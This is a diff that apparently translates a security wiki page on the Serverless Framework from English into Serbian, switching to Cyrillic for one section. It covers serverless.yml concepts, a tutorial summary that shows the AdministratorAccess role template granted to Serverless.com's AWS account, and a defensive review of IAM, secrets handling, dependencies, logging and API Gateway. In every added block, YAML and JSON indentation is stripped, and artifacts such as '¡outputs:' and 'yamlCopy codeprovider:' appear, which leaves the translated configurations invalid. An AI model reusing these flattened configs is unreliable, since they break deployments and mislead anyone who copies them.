+**Usluga** je osnovna komponenta serverless aplikacije. Predstavlja ceo vaš serverless projekat, obuhvatajući sve funkcije, konfiguracije i resurse koji su potrebni. Obično je definisana u `serverless.yml` datoteci, usluga uključuje metapodatke kao što su naziv usluge, konfiguracije provajdera, funkcije, događaje, resurse, dodatke i prilagođene varijable.
 ```yaml
 service: my-service
 provider:
-  name: aws
-  runtime: nodejs14.x
+name: aws
+runtime: nodejs14.x
 functions:
-  hello:
-    handler: handler.hello
+hello:
+handler: handler.hello
 ```
-
 

 
-Function
+Funkcija
 
-A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events.
-
-It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings.
+Jedna **Funkcija** predstavlja jednu serverless funkciju, kao što je AWS Lambda funkcija. Sadrži kod koji se izvršava kao odgovor na događaje.
 
+Definira se u odeljku `functions` u `serverless.yml`, specificirajući handler, runtime, događaje, promenljive okruženja i druge postavke.
 ```yaml
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - http:
-          path: hello
-          method: get
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
 ```
-
 

 
 

 
-Event
+Догађај
 
-**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed.
-
-Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more.
+**Догађаји** су тригери који активирају ваше серверлес функције. Они дефинишу како и када функција треба да се изврши.
 
+Уобичајени типови догађаја укључују HTTP захтеве, заказане догађаје (cron послови), догађаје базе података, учитавање датотека и још много тога.
 ```yaml
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - http:
-          path: hello
-          method: get
-      - schedule:
-          rate: rate(10 minutes)
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+- schedule:
+rate: rate(10 minutes)
 ```
-
 

 
 

 
-Resource
+Resursi
 
-**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles.
-
-They are specified under the `resources` section, often using CloudFormation syntax for AWS.
+**Resursi** vam omogućavaju da definišete dodatne cloud resurse na kojima vaša usluga zavisi, kao što su baze podataka, skladišni bucket-i ili IAM uloge.
 
+Oni se definišu u `resources` sekciji, često koristeći CloudFormation sintaksu za AWS.
 ```yaml
 resources:
-  Resources:
-    MyDynamoDBTable:
-      Type: AWS::DynamoDB::Table
-      Properties:
-        TableName: my-table
-        AttributeDefinitions:
-          - AttributeName: id
-            AttributeType: S
-        KeySchema:
-          - AttributeName: id
-            KeyType: HASH
-        ProvisionedThroughput:
-          ReadCapacityUnits: 1
-          WriteCapacityUnits: 1
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+TableName: my-table
+AttributeDefinitions:
+- AttributeName: id
+AttributeType: S
+KeySchema:
+- AttributeName: id
+KeyType: HASH
+ProvisionedThroughput:
+ReadCapacityUnits: 1
+WriteCapacityUnits: 1
 ```
-
 

 
 

 
-Provider
+Provajder
 
-The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider.
-
-It includes details like the runtime, region, stage, and credentials.
+Objekat **Provajder** specificira provajdera cloud usluga (npr., AWS, Azure, Google Cloud) i sadrži konfiguracione postavke relevantne za tog provajdera.
 
+Uključuje detalje kao što su runtime, region, stage i kredencijali.
 ```yaml
 yamlCopy codeprovider:
-  name: aws
-  runtime: nodejs14.x
-  region: us-east-1
-  stage: dev
+name: aws
+runtime: nodejs14.x
+region: us-east-1
+stage: dev
 ```
-
 

 
 

 
-Stage and Region
-
-The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments.
+Faza i Region
 
+Faza predstavlja različite okruženja (npr., razvoj, testiranje, proizvodnja) gde vaša usluga može biti postavljena. Omogućava konfiguracije i postavke specifične za okruženje.
 ```yaml
 provider:
-  stage: dev
+stage: dev
 ```
-
-The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations.
-
+Region definiše geografsku oblast u kojoj će vaši resursi biti postavljeni. Važno je za latenciju, usklađenost i dostupnost.
 ```yaml
 provider:
-  region: us-west-2
+region: us-west-2
 ```
-
 

 
 

 
 Plugins
 
-**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm.
-
+**Plugins** proširuju funkcionalnost Serverless Framework-a dodavanjem novih funkcija ili integracijom sa drugim alatima i uslugama. Definisani su u `plugins` sekciji i instaliraju se putem npm-a.
 ```yaml
 plugins:
-  - serverless-offline
-  - serverless-webpack
+- serverless-offline
+- serverless-webpack
 ```
-
 

 
 

 
 Layers
 
-**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions.
-
+**Layers** omogućavaju da pakujete i upravljate deljenim kodom ili zavisnostima odvojeno od vaših funkcija. Ovo promoviše ponovnu upotrebu i smanjuje veličine paketa za implementaciju. Definišu se u `layers` sekciji i referenciraju ih funkcije.
 ```yaml
 layers:
-  commonLibs:
-    path: layer-common
+commonLibs:
+path: layer-common
 functions:
-  hello:
-    handler: handler.hello
-    layers:
-      - { Ref: CommonLibsLambdaLayer }
+hello:
+handler: handler.hello
+layers:
+- { Ref: CommonLibsLambdaLayer }
+```
+

+
+

+
+Promenljive i Prilagođene Promenljive
+
+**Promenljive** omogućavaju dinamičku konfiguraciju omogućavajući korišćenje mesta za rezervaciju koja se rešavaju u vreme implementacije.
+
+- **Sintaksa:** `${variable}` sintaksa može referencirati promenljive okruženja, sadržaj datoteka ili druge konfiguracione parametre.
+
+```yaml
+functions:
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
+```
+
+* **Prilagođene Promenljive:** `custom` sekcija se koristi za definisanje korisničkih promenljivih i konfiguracija koje se mogu ponovo koristiti kroz `serverless.yml`.
+
+```yaml
+custom:
+tableName: my-dynamodb-table
+stage: ${opt:stage, 'dev'}
 ```
 
 

 
 

 
-Variables and Custom Variables
-
-**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
-
-- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
-
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      environment:
-        TABLE_NAME: ${self:custom.tableName}
-  ```
-
-* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
-
-  ```yaml
-  custom:
-    tableName: my-dynamodb-table
-    stage: ${opt:stage, 'dev'}
-  ```
-
-

-
-

-
-Outputs
-
-**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment.
+Izlazi
 
+**Izlazi** definišu vrednosti koje se vraćaju nakon što je usluga implementirana, kao što su ARNs resursa, krajnje tačke ili druge korisne informacije. Oni se specificiraju pod `outputs` sekcijom i često se koriste za izlaganje informacija drugim uslugama ili za lak pristup nakon implementacije.
 ```yaml
 ¡outputs:
-  ApiEndpoint:
-    Description: "API Gateway endpoint URL"
-    Value:
-      Fn::Join:
-        - ""
-        - - "https://"
-          - Ref: ApiGatewayRestApi
-          - ".execute-api."
-          - Ref: AWS::Region
-          - ".amazonaws.com/"
-          - Ref: AWS::Stage
+ApiEndpoint:
+Description: "API Gateway endpoint URL"
+Value:
+Fn::Join:
+- ""
+- - "https://"
+- Ref: ApiGatewayRestApi
+- ".execute-api."
+- Ref: AWS::Region
+- ".amazonaws.com/"
+- Ref: AWS::Stage
 ```
-
 

 
 

 
-IAM Roles and Permissions
-
-**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions.
+IAM Uloge i Dozvole
 
+**IAM Uloge i Dozvole** definišu bezbednosne akreditive i prava pristupa za vaše funkcije i druge resurse. Upravljaju se pod `provider` ili podešavanjima pojedinačnih funkcija kako bi se odredile potrebne dozvole.
 ```yaml
 provider:
-  [...]
-  iam:
-    role:
-      statements:
-        - Effect: 'Allow'
-          Action:
-            - 'dynamodb:PutItem'
-            - 'dynamodb:Get*'
-            - 'dynamodb:Scan*'
-            - 'dynamodb:UpdateItem'
-            - 'dynamodb:DeleteItem'
-          Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 ```
-
 

 
 

 
-Environment Variables
-
-**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions.
+Promenljive okruženja
 
+**Promenljive** vam omogućavaju da prosledite konfiguracione postavke i tajne vašim funkcijama bez hardkodiranja. Definisane su u `environment` sekciji za provajdera ili pojedinačne funkcije.
 ```yaml
 provider:
-  environment:
-    STAGE: ${self:provider.stage}
+environment:
+STAGE: ${self:provider.stage}
 functions:
-  hello:
-    handler: handler.hello
-    environment:
-      TABLE_NAME: ${self:custom.tableName}
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
 ```
-
 

 
 

 
-Dependencies
-
-**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`.
+Zavisnosti
 
+**Zavisnosti** upravljaju spoljnim bibliotekama i modulima koje vaše funkcije zahtevaju. Obično se upravljaju putem menadžera paketa kao što su npm ili pip, i pakovane su sa vašim paketom za implementaciju koristeći alate ili dodatke kao što je `serverless-webpack`.
 ```yaml
 plugins:
-  - serverless-webpack
+- serverless-webpack
 ```
-
 

 
 

 
 Hooks
 
-**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments.
-
+**Hooks** omogućavaju vam da pokrenete prilagođene skripte ili komande u određenim tačkama u životnom ciklusu implementacije. Definišu se korišćenjem dodataka ili unutar `serverless.yml` da bi se izvršile radnje pre ili posle implementacija.
 ```yaml
 custom:
-  hooks:
-    before:deploy:deploy: echo "Starting deployment..."
+hooks:
+before:deploy:deploy: echo "Starting deployment..."
 ```
-
 

 
 ### Tutorial
 
-This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial):
-
-1. Create an AWS account (Serverless.com start in AWS infrastructure)
-2. Create an account in serverless.com
-3. Create an app:
+Ovo je sažetak zvaničnog tutorijala [**iz dokumentacije**](https://www.serverless.com/framework/docs/tutorial):
 
+1. Kreirajte AWS nalog (Serverless.com počinje u AWS infrastrukturi)
+2. Kreirajte nalog na serverless.com
+3. Kreirajte aplikaciju:
 ```bash
 # Create temp folder for the tutorial
 mkdir /tmp/serverless-tutorial
@@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API)
 ## Create A New App
 ## Indicate a name like "tutorialapp)
 ```
-
-This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function:
+Ovo bi trebalo da kreira **aplikaciju** pod nazivom `tutorialapp` koju možete proveriti na [serverless.com](serverless.com-security.md) i folder pod nazivom `Tutorial` sa datotekom **`handler.js`** koja sadrži neki JS kod sa `helloworld` kodom i datotekom **`serverless.yml`** koja deklarira tu funkciju:
 
 {{#tabs }}
 {{#tab name="handler.js" }}
-
 ```javascript
 exports.hello = async (event) => {
-  return {
-    statusCode: 200,
-    body: JSON.stringify({
-      message: "Go Serverless v4! Your function executed successfully!",
-    }),
-  }
+return {
+statusCode: 200,
+body: JSON.stringify({
+message: "Go Serverless v4! Your function executed successfully!",
+}),
+}
 }
 ```
-
 {{#endtab }}
 {{#tab name="serverless.yml" }}
-
 ```yaml
 # "org" ensures this Service is used with the correct Serverless Framework Access Key.
 org: testing12342
@@ -342,130 +309,122 @@ app: tutorialapp
 service: Tutorial
 
 provider:
-  name: aws
-  runtime: nodejs20.x
+name: aws
+runtime: nodejs20.x
 
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - httpApi:
-          path: /
-          method: get
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
-   1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
-   2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role.
+4. Kreirajte AWS provajder, odlaskom na **dashboard** na `https://app.serverless.com//settings/providers?providerId=new&provider=aws`.
+1. Da bi se `serverless.com` omogućio pristup AWS-u, biće zatraženo da se pokrene cloudformation stack koristeći ovaj konfiguracioni fajl (u vreme pisanja ovog teksta): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+2. Ovaj šablon generiše ulogu pod nazivom **`SFRole-`** sa **`arn:aws:iam::aws:policy/AdministratorAccess`** nad nalogom sa Trust Identity koja omogućava `Serverless.com` AWS nalogu pristup toj ulozi.
 
 

 
 Yaml roleTemplate
-
 ```yaml
 Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments.
 Resources:
-  SFRole:
-    Type: AWS::IAM::Role
-    Properties:
-      AssumeRolePolicyDocument:
-        Version: "2012-10-17"
-        Statement:
-          - Effect: Allow
-            Principal:
-              AWS: arn:aws:iam::486128539022:root
-            Action:
-              - sts:AssumeRole
-            Condition:
-              StringEquals:
-                sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
-      Path: /
-      RoleName: !Ref RoleName
-      ManagedPolicyArns:
-        - arn:aws:iam::aws:policy/AdministratorAccess
-  ReporterFunction:
-    Type: Custom::ServerlessFrameworkReporter
-    Properties:
-      ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
-      OrgUid: !Ref OrgUid
-      RoleArn: !GetAtt SFRole.Arn
-      Alias: !Ref Alias
+SFRole:
+Type: AWS::IAM::Role
+Properties:
+AssumeRolePolicyDocument:
+Version: "2012-10-17"
+Statement:
+- Effect: Allow
+Principal:
+AWS: arn:aws:iam::486128539022:root
+Action:
+- sts:AssumeRole
+Condition:
+StringEquals:
+sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
+Path: /
+RoleName: !Ref RoleName
+ManagedPolicyArns:
+- arn:aws:iam::aws:policy/AdministratorAccess
+ReporterFunction:
+Type: Custom::ServerlessFrameworkReporter
+Properties:
+ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
+OrgUid: !Ref OrgUid
+RoleArn: !GetAtt SFRole.Arn
+Alias: !Ref Alias
 Outputs:
-  SFRoleArn:
-    Description: "ARN for the IAM Role used by Serverless Framework"
-    Value: !GetAtt SFRole.Arn
+SFRoleArn:
+Description: "ARN for the IAM Role used by Serverless Framework"
+Value: !GetAtt SFRole.Arn
 Parameters:
-  OrgUid:
-    Description: Serverless Framework Org Uid
-    Type: String
-  Alias:
-    Description: Serverless Framework Provider Alias
-    Type: String
-  RoleName:
-    Description: Serverless Framework Role Name
-    Type: String
+OrgUid:
+Description: Serverless Framework Org Uid
+Type: String
+Alias:
+Description: Serverless Framework Provider Alias
+Type: String
+RoleName:
+Description: Serverless Framework Role Name
+Type: String
 ```
-
 

 
 

 
-Trust Relationship
-
+Odnos poverenja
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::486128539022:root"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {
-        "StringEquals": {
-          "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::486128539022:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
+}
+}
+}
+]
 }
 ```
-
 

 
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas.
+5. U tutorijalu se traži da se kreira fajl `createCustomer.js` koji će u suštini kreirati novu API tačku koju obrađuje novi JS fajl i traži se da se izmeni fajl `serverless.yml` kako bi se generisala **nova DynamoDB tabela**, definisala **promenljiva okruženja**, uloga koja će koristiti generisane lambde.
 
 {{#tabs }}
 {{#tab name="createCustomer.js" }}
-
 ```javascript
 "use strict"
 const AWS = require("aws-sdk")
 module.exports.createCustomer = async (event) => {
-  const body = JSON.parse(Buffer.from(event.body, "base64").toString())
-  const dynamoDb = new AWS.DynamoDB.DocumentClient()
-  const putParams = {
-    TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
-    Item: {
-      primary_key: body.name,
-      email: body.email,
-    },
-  }
-  await dynamoDb.put(putParams).promise()
-  return {
-    statusCode: 201,
-  }
+const body = JSON.parse(Buffer.from(event.body, "base64").toString())
+const dynamoDb = new AWS.DynamoDB.DocumentClient()
+const putParams = {
+TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
+Item: {
+primary_key: body.name,
+email: body.email,
+},
+}
+await dynamoDb.put(putParams).promise()
+return {
+statusCode: 201,
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="serverless.yml" }}
-
 ```yaml
 # "org" ensures this Service is used with the correct Serverless Framework Access Key.
 org: testing12342
@@ -475,388 +434,379 @@ app: tutorialapp
 service: Tutorial
 
 provider:
-  name: aws
-  runtime: nodejs20.x
-  environment:
-    DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
-  iam:
-    role:
-      statements:
-        - Effect: "Allow"
-          Action:
-            - "dynamodb:PutItem"
-            - "dynamodb:Get*"
-            - "dynamodb:Scan*"
-            - "dynamodb:UpdateItem"
-            - "dynamodb:DeleteItem"
-          Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+name: aws
+runtime: nodejs20.x
+environment:
+DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
+iam:
+role:
+statements:
+- Effect: "Allow"
+Action:
+- "dynamodb:PutItem"
+- "dynamodb:Get*"
+- "dynamodb:Scan*"
+- "dynamodb:UpdateItem"
+- "dynamodb:DeleteItem"
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - httpApi:
-          path: /
-          method: get
-  createCustomer:
-    handler: createCustomer.createCustomer
-    events:
-      - httpApi:
-          path: /
-          method: post
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
+createCustomer:
+handler: createCustomer.createCustomer
+events:
+- httpApi:
+path: /
+method: post
 
 resources:
-  Resources:
-    CustomerTable:
-      Type: AWS::DynamoDB::Table
-      Properties:
-        AttributeDefinitions:
-          - AttributeName: primary_key
-            AttributeType: S
-        BillingMode: PAY_PER_REQUEST
-        KeySchema:
-          - AttributeName: primary_key
-            KeyType: HASH
-        TableName: ${self:service}-customerTable-${sls:stage}
+Resources:
+CustomerTable:
+Type: AWS::DynamoDB::Table
+Properties:
+AttributeDefinitions:
+- AttributeName: primary_key
+AttributeType: S
+BillingMode: PAY_PER_REQUEST
+KeySchema:
+- AttributeName: primary_key
+KeyType: HASH
+TableName: ${self:service}-customerTable-${sls:stage}
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 6. Deploy it running **`serverless deploy`**
-   1. The deployment will be performed via a CloudFormation Stack
-   2. Note that the **lambdas are exposed via API gateway** and not via direct URLs
+1. Implementacija će biti izvršena putem CloudFormation Stack-a
+2. Imajte na umu da su **lambde izložene putem API gateway-a** i ne putem direktnih URL-ova
 7. **Test it**
-   1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed
+1. Prethodni korak će odštampati **URL-ove** gde su vaši API endpoint lambda funkcije implementirane
 
 ## Security Review of Serverless.com
 
-### **Misconfigured IAM Roles and Permissions**
+### **Pogrešno konfigurisane IAM uloge i dozvole**
 
-Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation.
+Previše permisivne IAM uloge mogu omogućiti neovlašćen pristup cloud resursima, što može dovesti do curenja podataka ili manipulacije resursima.
 
-When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like:
+Kada nisu specificirane dozvole za Lambda funkciju, biće kreirana uloga sa dozvolama samo za generisanje logova, kao što je:
 
 

 
 Minimum lambda permissions
-
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Action": [
-        "logs:CreateLogStream",
-        "logs:CreateLogGroup",
-        "logs:TagResource"
-      ],
-      "Resource": [
-        "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
-      ],
-      "Effect": "Allow"
-    },
-    {
-      "Action": ["logs:PutLogEvents"],
-      "Resource": [
-        "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
-      ],
-      "Effect": "Allow"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Action": [
+"logs:CreateLogStream",
+"logs:CreateLogGroup",
+"logs:TagResource"
+],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
+],
+"Effect": "Allow"
+},
+{
+"Action": ["logs:PutLogEvents"],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
+],
+"Effect": "Allow"
+}
+]
 }
 ```
-
 

 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Principle of Least Privilege:** Assign only necessary permissions to each function.
-
-  ```yaml
-  provider:
-    [...]
-    iam:
-      role:
-        statements:
-          - Effect: 'Allow'
-            Action:
-              - 'dynamodb:PutItem'
-              - 'dynamodb:Get*'
-              - 'dynamodb:Scan*'
-              - 'dynamodb:UpdateItem'
-              - 'dynamodb:DeleteItem'
-            Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
-  ```
-
-- **Use Separate Roles:** Differentiate roles based on function requirements.
-
----
-
-### **Insecure Secrets and Configuration Management**
-
-Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised.
-
-The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**!
-
-> [!CAUTION]
-> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!**
-
-For example, the following example will use SSM to get an environment variable:
+- **Princip najmanjih privilegija:** Dodelite samo neophodne dozvole svakoj funkciji.
 
 ```yaml
 provider:
-  environment:
-    DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 ```
 
-And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**.
+- **Koristite odvojene uloge:** Diferencirajte uloge na osnovu zahteva funkcije.
+
+---
+
+### **Nepouzdane tajne i upravljanje konfiguracijom**
+
+Skladištenje osetljivih informacija (npr., API ključeva, kredencijala za bazu podataka) direktno u **`serverless.yml`** ili kodu može dovesti do izlaganja ako su repozitorijumi kompromitovani.
+
+**Preporučeni** način skladištenja promenljivih okruženja u **`serverless.yml`** datoteci sa serverless.com (u vreme pisanja ovog teksta) je korišćenje `ssm` ili `s3` provajdera, što omogućava dobijanje **vrednosti okruženja iz ovih izvora u vreme implementacije** i **konfiguriše** promenljive okruženja **lambdas** sa **tekstom bez vrednosti**!
+
+> [!CAUTION]
+> Stoga, svako ko ima dozvole za čitanje konfiguracije lambdas unutar AWS-a moći će da **pristupi svim ovim promenljivim okruženja u čistom tekstu!**
+
+Na primer, sledeći primer će koristiti SSM za dobijanje promenljive okruženja:
+```yaml
+provider:
+environment:
+DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+```
+I čak i ako ovo sprečava hardkodiranje vrednosti promenljive okruženja u **`serverless.yml`** datoteci, vrednost će biti dobijena u vreme implementacije i biće **dodata u čistom tekstu unutar lambda promenljive okruženja**.
 
 > [!TIP]
-> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**.
+> Preporučeni način za čuvanje promenljivih okruženja koristeći serveless.com bio bi da **sačuvate u AWS tajni** i samo sačuvate ime tajne u promenljivoj okruženja, a **lambda kod bi trebao da je prikupi**.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.**
-- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data.
-- **Access Controls:** Restrict access to secrets based on roles.
+- **Integracija sa Tajnim Menadžerom:** Koristite usluge kao što je **AWS Secrets Manager.**
+- **Enkriptovane Promenljive:** Iskoristite funkcije enkripcije Serverless Framework-a za osetljive podatke.
+- **Kontrola Pristupa:** Ograničite pristup tajnama na osnovu uloga.
 
 ---
 
-### **Vulnerable Code and Dependencies**
+### **Ranljiv Kôd i Zavisnosti**
 
-Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks.
+Zastarale ili nesigurne zavisnosti mogu uvesti ranjivosti, dok nepravilno rukovanje ulazima može dovesti do napada injekcijom koda.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities.
+- **Upravljanje Zavisnostima:** Redovno ažurirajte zavisnosti i skenirajte za ranjivosti.
 
-  ```yaml
-  plugins:
-    - serverless-webpack
-    - serverless-plugin-snyk
-  ```
+```yaml
+plugins:
+- serverless-webpack
+- serverless-plugin-snyk
+```
 
-- **Input Validation:** Implement strict validation and sanitization of all inputs.
-- **Code Reviews:** Conduct thorough reviews to identify security flaws.
-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase.
+- **Validacija Ulaza:** Implementirajte strogu validaciju i sanitizaciju svih ulaza.
+- **Revizije Kôda:** Sprovodite temeljne revizije kako biste identifikovali sigurnosne propuste.
+- **Statička Analiza:** Koristite alate za otkrivanje ranjivosti u bazi koda.
 
 ---
 
-### **Inadequate Logging and Monitoring**
+### **Neadekvatno Logovanje i Praćenje**
 
-Without proper logging and monitoring, malicious activities may go undetected, delaying incident response.
+Bez pravilnog logovanja i praćenja, zlonamerne aktivnosti mogu ostati neprimećene, odlažući odgovor na incidente.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**.
+- **Centralizovano Logovanje:** Agregirajte logove koristeći usluge kao što su **AWS CloudWatch** ili **Datadog**.
 
-  ```yaml
-  plugins:
-    - serverless-plugin-datadog
-  ```
+```yaml
+plugins:
+- serverless-plugin-datadog
+```
 
-- **Enable Detailed Logging:** Capture essential information without exposing sensitive data.
-- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies.
-- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents.
+- **Omogućite Detaljno Logovanje:** Zabeležite bitne informacije bez izlaganja osetljivih podataka.
+- **Postavite Alarme:** Konfigurišite alarme za sumnjive aktivnosti ili anomalije.
+- **Redovno Praćenje:** Kontinuirano pratite logove i metrike za potencijalne sigurnosne incidente.
 
 ---
 
-### **Insecure API Gateway Configurations**
+### **Neosigurane Konfiguracije API Gateway-a**
 
-Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks.
+Otvoreni ili nepravilno zaštićeni API-ji mogu se iskoristiti za neovlašćen pristup, napade uskraćivanja usluge (DoS) ili napade između sajtova.
 
-#### **Mitigation Strategies**
+#### **Strategije ublažavanja**
 
-- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT.
+- **Autentifikacija i Autorizacija:** Implementirajte robusne mehanizme kao što su OAuth, API ključevi ili JWT.
 
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      events:
-        - http:
-            path: hello
-            method: get
-            authorizer: aws_iam
-  ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+authorizer: aws_iam
+```
 
-- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates.
+- **Ograničavanje Brzine i Throttling:** Sprečite zloupotrebu ograničavanjem brzine zahteva.
 
-  ```yaml
-  provider:
